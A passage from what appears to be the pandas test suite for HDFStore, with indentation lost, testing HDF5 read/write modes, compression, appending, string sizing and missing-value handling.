assert '/foo/b' not in store
assert 'bar' not in store
# gh-2694: tables.NaturalNameWarning
with catch_warnings(record=True):
store['node())'] = tm.makeDataFrame()
assert 'node())' in store
def test_versioning(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeSeries()
store['b'] = tm.makeDataFrame()
df = tm.makeTimeDataFrame()
_maybe_remove(store, 'df1')
store.append('df1', df[:10])
store.append('df1', df[10:])
assert store.root.a._v_attrs.pandas_version == '0.15.2'
assert store.root.b._v_attrs.pandas_version == '0.15.2'
assert store.root.df1._v_attrs.pandas_version == '0.15.2'
# write a file and wipe its versioning
_maybe_remove(store, 'df2')
store.append('df2', df)
# this is an error because its table_type is appendable, but no
# version info
store.get_node('df2')._v_attrs.pandas_version = None
pytest.raises(Exception, store.select, 'df2')
def test_mode(self):
df = tm.makeTimeDataFrame()
def check(mode):
with ensure_clean_path(self.path) as path:
# constructor
if mode in ['r', 'r+']:
pytest.raises(IOError, HDFStore, path, mode=mode)
else:
store = HDFStore(path, mode=mode)
assert store._handle.mode == mode
store.close()
with ensure_clean_path(self.path) as path:
# context
if mode in ['r', 'r+']:
def f():
with HDFStore(path, mode=mode) as store: # noqa
pass
pytest.raises(IOError, f)
else:
with HDFStore(path, mode=mode) as store:
assert store._handle.mode == mode
with ensure_clean_path(self.path) as path:
# conv write
if mode in ['r', 'r+']:
pytest.raises(IOError, df.to_hdf,
path, 'df', mode=mode)
df.to_hdf(path, 'df', mode='w')
else:
df.to_hdf(path, 'df', mode=mode)
# conv read
if mode in ['w']:
pytest.raises(ValueError, read_hdf,
path, 'df', mode=mode)
else:
result = read_hdf(path, 'df', mode=mode)
assert_frame_equal(result, df)
def check_default_mode():
# read_hdf uses default mode
with ensure_clean_path(self.path) as path:
df.to_hdf(path, 'df', mode='w')
result = read_hdf(path, 'df')
assert_frame_equal(result, df)
check('r')
check('r+')
check('a')
check('w')
check_default_mode()
def test_reopen_handle(self):
with ensure_clean_path(self.path) as path:
store = HDFStore(path, mode='a')
store['a'] = tm.makeTimeSeries()
# invalid mode change
pytest.raises(PossibleDataLossError, store.open, 'w')
store.close()
assert not store.is_open
# truncation ok here
store.open('w')
assert store.is_open
assert len(store) == 0
store.close()
assert not store.is_open
store = HDFStore(path, mode='a')
store['a'] = tm.makeTimeSeries()
# reopen as read
store.open('r')
assert store.is_open
assert len(store) == 1
assert store._mode == 'r'
store.close()
assert not store.is_open
# reopen as append
store.open('a')
assert store.is_open
assert len(store) == 1
assert store._mode == 'a'
store.close()
assert not store.is_open
# reopen as append (again)
store.open('a')
assert store.is_open
assert len(store) == 1
assert store._mode == 'a'
store.close()
assert not store.is_open
def test_open_args(self):
with ensure_clean_path(self.path) as path:
df = tm.makeDataFrame()
# create an in memory store
store = HDFStore(path, mode='a', driver='H5FD_CORE',
driver_core_backing_store=0)
store['df'] = df
store.append('df2', df)
tm.assert_frame_equal(store['df'], df)
tm.assert_frame_equal(store['df2'], df)
store.close()
# the file should not have actually been written
assert not os.path.exists(path)
def test_flush(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeSeries()
store.flush()
store.flush(fsync=True)
def test_get(self):
with ensure_clean_store(self.path) as store:
store['a'] = tm.makeTimeSeries()
left = store.get('a')
right = store['a']
tm.assert_series_equal(left, right)
left = store.get('/a')
right = store['/a']
tm.assert_series_equal(left, right)
pytest.raises(KeyError, store.get, 'b')
def test_getattr(self):
with ensure_clean_store(self.path) as store:
s = tm.makeTimeSeries()
store['a'] = s
# test attribute access
result = store.a
tm.assert_series_equal(result, s)
result = getattr(store, 'a')
tm.assert_series_equal(result, s)
df = tm.makeTimeDataFrame()
store['df'] = df
result = store.df
tm.assert_frame_equal(result, df)
# errors
pytest.raises(AttributeError, getattr, store, 'd')
for x in ['mode', 'path', 'handle', 'complib']:
pytest.raises(AttributeError, getattr, store, x)
# not stores
for x in ['mode', 'path', 'handle', 'complib']:
getattr(store, "_%s" % x)
def test_put(self):
with ensure_clean_store(self.path) as store:
ts = tm.makeTimeSeries()
df = tm.makeTimeDataFrame()
store['a'] = ts
store['b'] = df[:10]
store['foo/bar/bah'] = df[:10]
store['foo'] = df[:10]
store['/foo'] = df[:10]
store.put('c', df[:10], format='table')
# not OK, not a table
pytest.raises(
ValueError, store.put, 'b', df[10:], append=True)
# node does not currently exist, test _is_table_type returns False
# in this case
# _maybe_remove(store, 'f')
# pytest.raises(ValueError, store.put, 'f', df[10:],
# append=True)
# can't put to a table (use append instead)
pytest.raises(ValueError, store.put, 'c', df[10:], append=True)
# overwrite table
store.put('c', df[:10], format='table', append=False)
tm.assert_frame_equal(df[:10], store['c'])
def test_put_string_index(self):
with ensure_clean_store(self.path) as store:
index = Index(
["I am a very long string index: %s" % i for i in range(20)])
s = Series(np.arange(20), index=index)
df = DataFrame({'A': s, 'B': s})
store['a'] = s
tm.assert_series_equal(store['a'], s)
store['b'] = df
tm.assert_frame_equal(store['b'], df)
# mixed length
index = Index(['abcdefghijklmnopqrstuvwxyz1234567890'] +
["I am a very long string index: %s" % i
for i in range(20)])
s = Series(np.arange(21), index=index)
df = DataFrame({'A': s, 'B': s})
store['a'] = s
tm.assert_series_equal(store['a'], s)
store['b'] = df
tm.assert_frame_equal(store['b'], df)
def test_put_compression(self):
with ensure_clean_store(self.path) as store:
df = tm.makeTimeDataFrame()
store.put('c', df, format='table', complib='zlib')
tm.assert_frame_equal(store['c'], df)
# can't compress if format='fixed'
pytest.raises(ValueError, store.put, 'b', df,
format='fixed', complib='zlib')
@td.skip_if_windows_python_3
def test_put_compression_blosc(self):
df = tm.makeTimeDataFrame()
with ensure_clean_store(self.path) as store:
# can't compress if format='fixed'
pytest.raises(ValueError, store.put, 'b', df,
format='fixed', complib='blosc')
store.put('c', df, format='table', complib='blosc')
tm.assert_frame_equal(store['c'], df)
def test_complibs_default_settings(self):
# GH15943
df = tm.makeDataFrame()
# Set complevel and check if complib is automatically set to
# default value
with ensure_clean_path(self.path) as tmpfile:
df.to_hdf(tmpfile, 'df', complevel=9)
result = pd.read_hdf(tmpfile, 'df')
tm.assert_frame_equal(result, df)
with tables.open_file(tmpfile, mode='r') as h5file:
for node in h5file.walk_nodes(where='/df', classname='Leaf'):
assert node.filters.complevel == 9
assert node.filters.complib == 'zlib'
# Set complib and check to see if compression is disabled
with ensure_clean_path(self.path) as tmpfile:
df.to_hdf(tmpfile, 'df', complib='zlib')
result = pd.read_hdf(tmpfile, 'df')
tm.assert_frame_equal(result, df)
with tables.open_file(tmpfile, mode='r') as h5file:
for node in h5file.walk_nodes(where='/df', classname='Leaf'):
assert node.filters.complevel == 0
assert node.filters.complib is None
# Check if not setting complib or complevel results in no compression
with ensure_clean_path(self.path) as tmpfile:
df.to_hdf(tmpfile, 'df')
result = pd.read_hdf(tmpfile, 'df')
tm.assert_frame_equal(result, df)
with tables.open_file(tmpfile, mode='r') as h5file:
for node in h5file.walk_nodes(where='/df', classname='Leaf'):
assert node.filters.complevel == 0
assert node.filters.complib is None
# Check if file-defaults can be overridden on a per table basis
with ensure_clean_path(self.path) as tmpfile:
store = pd.HDFStore(tmpfile)
store.append('dfc', df, complevel=9, complib='blosc')
store.append('df', df)
store.close()
with tables.open_file(tmpfile, mode='r') as h5file:
for node in h5file.walk_nodes(where='/df', classname='Leaf'):
assert node.filters.complevel == 0
assert node.filters.complib is None
for node in h5file.walk_nodes(where='/dfc', classname='Leaf'):
assert node.filters.complevel == 9
assert node.filters.complib == 'blosc'
def test_complibs(self):
# GH14478
df = tm.makeDataFrame()
# Building list of all complibs and complevels tuples
all_complibs = tables.filters.all_complibs
# Remove lzo if its not available on this platform
if not tables.which_lib_version('lzo'):
all_complibs.remove('lzo')
# Remove bzip2 if its not available on this platform
if not tables.which_lib_version("bzip2"):
all_complibs.remove("bzip2")
all_levels = range(0, 10)
all_tests = [(lib, lvl) for lib in all_complibs for lvl in all_levels]
for (lib, lvl) in all_tests:
with ensure_clean_path(self.path) as tmpfile:
gname = 'foo'
# Write and read file to see if data is consistent
df.to_hdf(tmpfile, gname, complib=lib, complevel=lvl)
result = pd.read_hdf(tmpfile, gname)
tm.assert_frame_equal(result, df)
# Open file and check metadata
# for correct amount of compression
h5table = tables.open_file(tmpfile, mode='r')
for node in h5table.walk_nodes(where='/' + gname,
classname='Leaf'):
assert node.filters.complevel == lvl
if lvl == 0:
assert node.filters.complib is None
else:
assert node.filters.complib == lib
h5table.close()
def test_put_integer(self):
# non-date, non-string index
df = DataFrame(np.random.randn(50, 100))
self._check_roundtrip(df, tm.assert_frame_equal)
def test_put_mixed_type(self):
df = tm.makeTimeDataFrame()
df['obj1'] = 'foo'
df['obj2'] = 'bar'
df['bool1'] = df['A'] > 0
df['bool2'] = df['B'] > 0
df['bool3'] = True
df['int1'] = 1
df['int2'] = 2
df['timestamp1'] = Timestamp('20010102')
df['timestamp2'] = Timestamp('20010103')
df['datetime1'] = datetime.datetime(2001, 1, 2, 0, 0)
df['datetime2'] = datetime.datetime(2001, 1, 3, 0, 0)
df.loc[3:6, ['obj1']] = np.nan
df = df._consolidate()._convert(datetime=True)
with ensure_clean_store(self.path) as store:
_maybe_remove(store, 'df')
# PerformanceWarning
with catch_warnings(record=True):
store.put('df', df)
expected = store.get('df')
tm.assert_frame_equal(expected, df)
def test_append(self):
with ensure_clean_store(self.path) as store:
            # this is allowed but you almost always don't want to do it
            # (tables.NaturalNameWarning)
with catch_warnings(record=True):
df = tm.makeTimeDataFrame()
_maybe_remove(store, 'df1')
store.append('df1', df[:10])
store.append('df1', df[10:])
tm.assert_frame_equal(store['df1'], df)
_maybe_remove(store, 'df2')
store.put('df2', df[:10], format='table')
store.append('df2', df[10:])
tm.assert_frame_equal(store['df2'], df)
_maybe_remove(store, 'df3')
store.append('/df3', df[:10])
store.append('/df3', df[10:])
tm.assert_frame_equal(store['df3'], df)
                # this is allowed but you almost always don't want to do it
                # (tables.NaturalNameWarning)
_maybe_remove(store, '/df3 foo')
store.append('/df3 foo', df[:10])
store.append('/df3 foo', df[10:])
tm.assert_frame_equal(store['df3 foo'], df)
# panel
wp = tm.makePanel()
_maybe_remove(store, 'wp1')
store.append('wp1', wp.iloc[:, :10, :])
store.append('wp1', wp.iloc[:, 10:, :])
assert_panel_equal(store['wp1'], wp)
# ndim
p4d = tm.makePanel4D()
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :])
store.append('p4d', p4d.iloc[:, :, 10:, :])
assert_panel4d_equal(store['p4d'], p4d)
# test using axis labels
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :], axes=[
'items', 'major_axis', 'minor_axis'])
store.append('p4d', p4d.iloc[:, :, 10:, :], axes=[
'items', 'major_axis', 'minor_axis'])
assert_panel4d_equal(store['p4d'], p4d)
# test using different number of items on each axis
p4d2 = p4d.copy()
p4d2['l4'] = p4d['l1']
p4d2['l5'] = p4d['l1']
_maybe_remove(store, 'p4d2')
store.append(
'p4d2', p4d2, axes=['items', 'major_axis', 'minor_axis'])
assert_panel4d_equal(store['p4d2'], p4d2)
                # test using a different order of items on the non-index axes
_maybe_remove(store, 'wp1')
wp_append1 = wp.iloc[:, :10, :]
store.append('wp1', wp_append1)
wp_append2 = wp.iloc[:, 10:, :].reindex(items=wp.items[::-1])
store.append('wp1', wp_append2)
assert_panel_equal(store['wp1'], wp)
                # dtype issues - mixed type in a single object column
df = DataFrame(data=[[1, 2], [0, 1], [1, 2], [0, 0]])
df['mixed_column'] = 'testing'
df.loc[2, 'mixed_column'] = np.nan
_maybe_remove(store, 'df')
store.append('df', df)
tm.assert_frame_equal(store['df'], df)
# uints - test storage of uints
uint_data = DataFrame({
'u08': Series(np.random.randint(0, high=255, size=5),
dtype=np.uint8),
'u16': Series(np.random.randint(0, high=65535, size=5),
dtype=np.uint16),
'u32': Series(np.random.randint(0, high=2**30, size=5),
dtype=np.uint32),
'u64': Series([2**58, 2**59, 2**60, 2**61, 2**62],
dtype=np.uint64)}, index=np.arange(5))
_maybe_remove(store, 'uints')
store.append('uints', uint_data)
tm.assert_frame_equal(store['uints'], uint_data)
# uints - test storage of uints in indexable columns
_maybe_remove(store, 'uints')
# 64-bit indices not yet supported
store.append('uints', uint_data, data_columns=[
'u08', 'u16', 'u32'])
tm.assert_frame_equal(store['uints'], uint_data)
def test_append_series(self):
with ensure_clean_store(self.path) as store:
# basic
ss = tm.makeStringSeries()
ts = tm.makeTimeSeries()
ns = Series(np.arange(100))
store.append('ss', ss)
result = store['ss']
tm.assert_series_equal(result, ss)
assert result.name is None
store.append('ts', ts)
result = store['ts']
tm.assert_series_equal(result, ts)
assert result.name is None
ns.name = 'foo'
store.append('ns', ns)
result = store['ns']
tm.assert_series_equal(result, ns)
assert result.name == ns.name
# select on the values
expected = ns[ns > 60]
result = store.select('ns', 'foo>60')
tm.assert_series_equal(result, expected)
# select on the index and values
expected = ns[(ns > 70) & (ns.index < 90)]
result = store.select('ns', 'foo>70 and index<90')
tm.assert_series_equal(result, expected)
# multi-index
mi = DataFrame(np.random.randn(5, 1), columns=['A'])
mi['B'] = np.arange(len(mi))
mi['C'] = 'foo'
mi.loc[3:5, 'C'] = 'bar'
mi.set_index(['C', 'B'], inplace=True)
s = mi.stack()
s.index = s.index.droplevel(2)
store.append('mi', s)
tm.assert_series_equal(store['mi'], s)
def test_store_index_types(self):
# GH5386
# test storing various index types
with ensure_clean_store(self.path) as store:
def check(format, index):
df = DataFrame(np.random.randn(10, 2), columns=list('AB'))
df.index = index(len(df))
_maybe_remove(store, 'df')
store.put('df', df, format=format)
assert_frame_equal(df, store['df'])
for index in [tm.makeFloatIndex, tm.makeStringIndex,
tm.makeIntIndex, tm.makeDateIndex]:
check('table', index)
check('fixed', index)
# period index currently broken for table
            # see GH7796 FIXME
check('fixed', tm.makePeriodIndex)
# check('table',tm.makePeriodIndex)
# unicode
index = tm.makeUnicodeIndex
if compat.PY3:
check('table', index)
check('fixed', index)
else:
# only support for fixed types (and they have a perf warning)
pytest.raises(TypeError, check, 'table', index)
# PerformanceWarning
with catch_warnings(record=True):
check('fixed', index)
@pytest.mark.skipif(not is_platform_little_endian(),
reason="reason platform is not little endian")
def test_encoding(self):
with ensure_clean_store(self.path) as store:
df = DataFrame(dict(A='foo', B='bar'), index=range(5))
df.loc[2, 'A'] = np.nan
df.loc[3, 'B'] = np.nan
_maybe_remove(store, 'df')
store.append('df', df, encoding='ascii')
tm.assert_frame_equal(store['df'], df)
expected = df.reindex(columns=['A'])
result = store.select('df', Term('columns=A', encoding='ascii'))
tm.assert_frame_equal(result, expected)
def test_latin_encoding(self):
if compat.PY2:
tm.assert_raises_regex(
TypeError, r'\[unicode\] is not implemented as a table column')
return
values = [[b'E\xc9, 17', b'', b'a', b'b', b'c'],
[b'E\xc9, 17', b'a', b'b', b'c'],
[b'EE, 17', b'', b'a', b'b', b'c'],
[b'E\xc9, 17', b'\xf8\xfc', b'a', b'b', b'c'],
[b'', b'a', b'b', b'c'],
[b'\xf8\xfc', b'a', b'b', b'c'],
[b'A\xf8\xfc', b'', b'a', b'b', b'c'],
[np.nan, b'', b'b', b'c'],
[b'A\xf8\xfc', np.nan, b'', b'b', b'c']]
def _try_decode(x, encoding='latin-1'):
try:
return x.decode(encoding)
except AttributeError:
return x
# not sure how to remove latin-1 from code in python 2 and 3
values = [[_try_decode(x) for x in y] for y in values]
examples = []
for dtype in ['category', object]:
for val in values:
examples.append(pd.Series(val, dtype=dtype))
def roundtrip(s, key='data', encoding='latin-1', nan_rep=''):
with ensure_clean_path(self.path) as store:
s.to_hdf(store, key, format='table', encoding=encoding,
nan_rep=nan_rep)
retr = read_hdf(store, key)
s_nan = s.replace(nan_rep, np.nan)
if is_categorical_dtype(s_nan):
assert is_categorical_dtype(retr)
assert_series_equal(s_nan, retr, check_dtype=False,
check_categorical=False)
else:
assert_series_equal(s_nan, retr)
for s in examples:
roundtrip(s)
# fails:
# for x in examples:
# roundtrip(s, nan_rep=b'\xf8\xfc')
def test_append_some_nans(self):
with ensure_clean_store(self.path) as store:
df = DataFrame({'A': Series(np.random.randn(20)).astype('int32'),
'A1': np.random.randn(20),
'A2': np.random.randn(20),
'B': 'foo', 'C': 'bar',
'D': Timestamp("20010101"),
'E': datetime.datetime(2001, 1, 2, 0, 0)},
index=np.arange(20))
# some nans
_maybe_remove(store, 'df1')
df.loc[0:15, ['A1', 'B', 'D', 'E']] = np.nan
store.append('df1', df[:10])
store.append('df1', df[10:])
tm.assert_frame_equal(store['df1'], df)
# first column
df1 = df.copy()
df1.loc[:, 'A1'] = np.nan
_maybe_remove(store, 'df1')
store.append('df1', df1[:10])
store.append('df1', df1[10:])
tm.assert_frame_equal(store['df1'], df1)
# 2nd column
df2 = df.copy()
df2.loc[:, 'A2'] = np.nan
_maybe_remove(store, 'df2')
store.append('df2', df2[:10])
store.append('df2', df2[10:])
tm.assert_frame_equal(store['df2'], df2)
# datetimes
df3 = df.copy()
df3.loc[:, 'E'] = np.nan
_maybe_remove(store, 'df3')
store.append('df3', df3[:10])
store.append('df3', df3[10:])
tm.assert_frame_equal(store['df3'], df3)
def test_append_all_nans(self):
with ensure_clean_store(self.path) as store:
df = DataFrame({'A1': np.random.randn(20),
'A2': np.random.randn(20)},
index=np.arange(20))
df.loc[0:15, :] = np.nan
# nan some entire rows (dropna=True)
_maybe_remove(store, 'df')
store.append('df', df[:10], dropna=True)
store.append('df', df[10:], dropna=True)
tm.assert_frame_equal(store['df'], df[-4:])
# nan some entire rows (dropna=False)
_maybe_remove(store, 'df2')
store.append('df2', df[:10], dropna=False)
store.append('df2', df[10:], dropna=False)
tm.assert_frame_equal(store['df2'], df)
# tests the option io.hdf.dropna_table
pd.set_option('io.hdf.dropna_table', False)
_maybe_remove(store, 'df3')
store.append('df3', df[:10])
store.append('df3', df[10:])
tm.assert_frame_equal(store['df3'], df)
pd.set_option('io.hdf.dropna_table', True)
_maybe_remove(store, 'df4')
store.append('df4', df[:10])
store.append('df4', df[10:])
tm.assert_frame_equal(store['df4'], df[-4:])
# nan some entire rows (string are still written!)
df = DataFrame({'A1': np.random.randn(20),
'A2': np.random.randn(20),
'B': 'foo', 'C': 'bar'},
index=np.arange(20))
df.loc[0:15, :] = np.nan
_maybe_remove(store, 'df')
store.append('df', df[:10], dropna=True)
store.append('df', df[10:], dropna=True)
tm.assert_frame_equal(store['df'], df)
_maybe_remove(store, 'df2')
store.append('df2', df[:10], dropna=False)
store.append('df2', df[10:], dropna=False)
tm.assert_frame_equal(store['df2'], df)
# nan some entire rows (but since we have dates they are still
# written!)
df = DataFrame({'A1': np.random.randn(20),
'A2': np.random.randn(20),
'B': 'foo', 'C': 'bar',
'D': Timestamp("20010101"),
'E': datetime.datetime(2001, 1, 2, 0, 0)},
index=np.arange(20))
df.loc[0:15, :] = np.nan
_maybe_remove(store, 'df')
store.append('df', df[:10], dropna=True)
store.append('df', df[10:], dropna=True)
tm.assert_frame_equal(store['df'], df)
_maybe_remove(store, 'df2')
store.append('df2', df[:10], dropna=False)
store.append('df2', df[10:], dropna=False)
tm.assert_frame_equal(store['df2'], df)
# Test to make sure defaults are to not drop.
# Corresponding to Issue 9382
df_with_missing = DataFrame(
{'col1': [0, np.nan, 2], 'col2': [1, np.nan, np.nan]})
with ensure_clean_path(self.path) as path:
df_with_missing.to_hdf(path, 'df_with_missing', format='table')
reloaded = read_hdf(path, 'df_with_missing')
tm.assert_frame_equal(df_with_missing, reloaded)
matrix = [[[np.nan, np.nan, np.nan], [1, np.nan, np.nan]],
[[np.nan, np.nan, np.nan], [np.nan, 5, 6]],
[[np.nan, np.nan, np.nan], [np.nan, 3, np.nan]]]
with catch_warnings(record=True):
panel_with_missing = Panel(matrix,
items=['Item1', 'Item2', 'Item3'],
major_axis=[1, 2],
minor_axis=['A', 'B', 'C'])
with ensure_clean_path(self.path) as path:
panel_with_missing.to_hdf(
path, 'panel_with_missing', format='table')
reloaded_panel = read_hdf(path, 'panel_with_missing')
tm.assert_panel_equal(panel_with_missing, reloaded_panel)
def test_append_frame_column_oriented(self):
with ensure_clean_store(self.path) as store:
# column oriented
df = tm.makeTimeDataFrame()
_maybe_remove(store, 'df1')
store.append('df1', df.iloc[:, :2], axes=['columns'])
store.append('df1', df.iloc[:, 2:])
tm.assert_frame_equal(store['df1'], df)
result = store.select('df1', 'columns=A')
expected = df.reindex(columns=['A'])
tm.assert_frame_equal(expected, result)
# selection on the non-indexable
result = store.select(
'df1', ('columns=A', 'index=df.index[0:4]'))
expected = df.reindex(columns=['A'], index=df.index[0:4])
tm.assert_frame_equal(expected, result)
# this isn't supported
with pytest.raises(TypeError):
store.select('df1',
'columns=A and index>df.index[4]')
def test_append_with_different_block_ordering(self):
# GH 4096; using same frames, but different block orderings
with ensure_clean_store(self.path) as store:
for i in range(10):
df = DataFrame(np.random.randn(10, 2), columns=list('AB'))
df['index'] = range(10)
df['index'] += i * 10
df['int64'] = Series([1] * len(df), dtype='int64')
df['int16'] = Series([1] * len(df), dtype='int16')
if i % 2 == 0:
del df['int64']
df['int64'] = Series([1] * len(df), dtype='int64')
if i % 3 == 0:
a = df.pop('A')
df['A'] = a
df.set_index('index', inplace=True)
store.append('df', df)
# test a different ordering but with more fields (like invalid
# combinate)
with ensure_clean_store(self.path) as store:
df = DataFrame(np.random.randn(10, 2),
columns=list('AB'), dtype='float64')
df['int64'] = Series([1] * len(df), dtype='int64')
df['int16'] = Series([1] * len(df), dtype='int16')
store.append('df', df)
# store additional fields in different blocks
df['int16_2'] = Series([1] * len(df), dtype='int16')
pytest.raises(ValueError, store.append, 'df', df)
# store multile additional fields in different blocks
df['float_3'] = Series([1.] * len(df), dtype='float64')
pytest.raises(ValueError, store.append, 'df', df)
def test_ndim_indexables(self):
# test using ndim tables in new ways
with catch_warnings(record=True):
with ensure_clean_store(self.path) as store:
p4d = tm.makePanel4D()
def check_indexers(key, indexers):
for i, idx in enumerate(indexers):
descr = getattr(store.root, key).table.description
assert getattr(descr, idx)._v_pos == i
# append then change (will take existing schema)
indexers = ['items', 'major_axis', 'minor_axis']
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :], axes=indexers)
store.append('p4d', p4d.iloc[:, :, 10:, :])
assert_panel4d_equal(store.select('p4d'), p4d)
check_indexers('p4d', indexers)
# same as above, but try to append with different axes
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :], axes=indexers)
store.append('p4d', p4d.iloc[:, :, 10:, :], axes=[
'labels', 'items', 'major_axis'])
assert_panel4d_equal(store.select('p4d'), p4d)
check_indexers('p4d', indexers)
# pass incorrect number of axes
_maybe_remove(store, 'p4d')
pytest.raises(ValueError, store.append, 'p4d', p4d.iloc[
:, :, :10, :], axes=['major_axis', 'minor_axis'])
# different than default indexables #1
indexers = ['labels', 'major_axis', 'minor_axis']
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :], axes=indexers)
store.append('p4d', p4d.iloc[:, :, 10:, :])
assert_panel4d_equal(store['p4d'], p4d)
check_indexers('p4d', indexers)
# different than default indexables #2
indexers = ['major_axis', 'labels', 'minor_axis']
_maybe_remove(store, 'p4d')
store.append('p4d', p4d.iloc[:, :, :10, :], axes=indexers)
store.append('p4d', p4d.iloc[:, :, 10:, :])
assert_panel4d_equal(store['p4d'], p4d)
check_indexers('p4d', indexers)
# partial selection
result = store.select('p4d', ['labels=l1'])
expected = p4d.reindex(labels=['l1'])
assert_panel4d_equal(result, expected)
# partial selection2
result = store.select(
'p4d', "labels='l1' and items='ItemA' and minor_axis='B'")
expected = p4d.reindex(
labels=['l1'], items=['ItemA'], minor_axis=['B'])
assert_panel4d_equal(result, expected)
# non-existent partial selection
result = store.select(
'p4d', "labels='l1' and items='Item1' and minor_axis='B'")
expected = p4d.reindex(labels=['l1'], items=[],
minor_axis=['B'])
assert_panel4d_equal(result, expected)
def test_append_with_strings(self):
with ensure_clean_store(self.path) as store:
with catch_warnings(record=True):
wp = tm.makePanel()
wp2 = wp.rename_axis(
{x: "%s_extra" % x for x in wp.minor_axis}, axis=2)
def check_col(key, name, size):
assert getattr(store.get_storer(key)
.table.description, name).itemsize == size
store.append('s1', wp, min_itemsize=20)
store.append('s1', wp2)
expected = concat([wp, wp2], axis=2)
expected = expected.reindex(
minor_axis=sorted(expected.minor_axis))
assert_panel_equal(store['s1'], expected)
check_col('s1', 'minor_axis', 20)
# test dict format
store.append('s2', wp, min_itemsize={'minor_axis': 20})
store.append('s2', wp2)
expected = concat([wp, wp2], axis=2)
expected = expected.reindex(
minor_axis=sorted(expected.minor_axis))
assert_panel_equal(store['s2'], expected)
check_col('s2', 'minor_axis', 20)
# apply the wrong field (similar to #1)
store.append('s3', wp, min_itemsize={'major_axis': 20})
pytest.raises(ValueError, store.append, 's3', wp2)
# test truncation of bigger strings
store.append('s4', wp)
pytest.raises(ValueError, store.append, 's4', wp2)
# avoid truncation on elements
df = DataFrame([[123, 'asdqwerty'], [345, 'dggnhebbsdfbdfb']])
store.append('df_big', df)
tm.assert_frame_equal(store.select('df_big'), df)
check_col('df_big', 'values_block_1', 15)
# appending smaller string ok
df2 = DataFrame([[124, 'asdqy'], [346, 'dggnhefbdfb']])
store.append('df_big', df2)
expected = concat([df, df2])
tm.assert_frame_equal(store.select('df_big'), expected)
check_col('df_big', 'values_block_1', 15)
# avoid truncation on elements
df = DataFrame([[123, 'asdqwerty'], [345, 'dggnhebbsdfbdfb']])
store.append('df_big2', df, min_itemsize={'values': 50})
tm.assert_frame_equal(store.select('df_big2'), df)
check_col('df_big2', 'values_block_1', 50)
# bigger string on next append
store.append('df_new', df)
df_new = DataFrame(
[[124, 'abcdefqhij'], [346, 'abcdefghijklmnopqrtsuvwxyz']])
pytest.raises(ValueError, store.append, 'df_new', df_new)
# min_itemsize on Series index (GH 11412)
df = tm.makeMixedDataFrame().set_index('C')
store.append('ss', df['B'], min_itemsize={'index': 4})
tm.assert_series_equal(store.select('ss'), df['B'])
# same as above, with data_columns=True
store.append('ss2', df['B'], data_columns=True,
min_itemsize={'index': 4})
tm.assert_series_equal(store.select('ss2'), df['B'])
# min_itemsize in index without appending (GH 10381)
store.put('ss3', df, format='table',
min_itemsize={'index': 6})
# just make sure there is a longer string:
df2 = df.copy().reset_index().assign(C='longer').set_index('C')
store.append('ss3', df2)
tm.assert_frame_equal(store.select('ss3'),
pd.concat([df, df2]))
# same as above, with a Series
store.put('ss4', df['B'], format='table',
min_itemsize={'index': 6})
store.append('ss4', df2['B'])
tm.assert_series_equal(store.select('ss4'),
pd.concat([df['B'], df2['B']]))
# with nans
_maybe_remove(store, 'df')
df = tm.makeTimeDataFrame()
df['string'] = 'foo'
df.loc[1:4, 'string'] = np.nan
df['string2'] = 'bar'
df.loc[4:8, 'string2'] = np.nan
df['string3'] = 'bah'
df.loc[1:, 'string3'] = np.nan
store.append('df', df)
result = store.select('df')
tm.assert_frame_equal(result, df)
with ensure_clean_store(self.path) as store:
def check_col(key, name, size):
assert getattr(store.get_storer(key)
.table.description, name).itemsize == size
df = DataFrame(dict(A='foo', B='bar'), index=range(10))
# a min_itemsize that creates a data_column
_maybe_remove(store, 'df')
store.append('df', df, min_itemsize={'A': 200})
check_col('df', 'A', 200)
assert store.get_storer('df').data_columns == ['A']
# a min_itemsize that creates a data_column, alongside explicit data_columns
_maybe_remove(store, 'df')
store.append('df', df, data_columns=['B'], min_itemsize={'A': 200})
check_col('df', 'A', 200)
assert store.get_storer('df').data_columns == ['B', 'A']
# min_itemsize keyed on 'values' sizes both the data_column and the values block
_maybe_remove(store, 'df')
store.append('df', df, data_columns=[
'B'], min_itemsize={'values': 200})
check_col('df', 'B', 200)
check_col('df', 'values_block_0', 200)
assert store.get_storer('df').data_columns == ['B']
# infer the .typ on subsequent appends
_maybe_remove(store, 'df')
store.append('df', df[:5], min_itemsize=200)
store.append('df', df[5:], min_itemsize=200)
tm.assert_frame_equal(store['df'], df)
# invalid min_itemsize keys
df = DataFrame(['foo', 'foo', 'foo', 'barh',
'barh', 'barh'], columns=['A'])
_maybe_remove(store, 'df')
pytest.raises(ValueError, store.append, 'df',
df, min_itemsize={'foo': 20, 'foobar': 20})
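# Note on min_itemsize: it reserves the on-disk string width of a column so
# that longer strings can be appended later; an int applies to every string
# column, while a dict maps column names (or the special keys 'values' and
# 'index') to widths.  Keys that name nothing in the table raise ValueError,
# as above.  Minimal sketch (illustrative key name):
#   store.append('demo', df, min_itemsize={'A': 50})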
def test_to_hdf_with_min_itemsize(self):
with ensure_clean_path(self.path) as path:
# min_itemsize in index with to_hdf (GH 10381)
df = tm.makeMixedDataFrame().set_index('C')
df.to_hdf(path, 'ss3', format='table', min_itemsize={'index': 6})
# just make sure there is a longer string:
df2 = df.copy().reset_index().assign(C='longer').set_index('C')
df2.to_hdf(path, 'ss3', append=True, format='table')
tm.assert_frame_equal(pd.read_hdf(path, 'ss3'),
pd.concat([df, df2]))
# same as above, with a Series
df['B'].to_hdf(path, 'ss4', format='table',
min_itemsize={'index': 6})
df2['B'].to_hdf(path, 'ss4', append=True, format='table')
tm.assert_series_equal(pd.read_hdf(path, 'ss4'),
pd.concat([df['B'], df2['B']]))
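# Note on data_columns: columns listed there are written out as individual,
# queryable columns (usable in where expressions) and can be indexed; all
# other columns are packed into block columns such as 'values_block_0'.
# Minimal sketch (illustrative key name):
#   store.append('dc_demo', df, data_columns=['B'])
#   store.select('dc_demo', 'B > 0')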
def test_append_with_data_columns(self):
with ensure_clean_store(self.path) as store:
df = tm.makeTimeDataFrame()
df.iloc[0, df.columns.get_loc('B')] = 1.
_maybe_remove(store, 'df')
store.append('df', df[:2], data_columns=['B'])
store.append('df', df[2:])
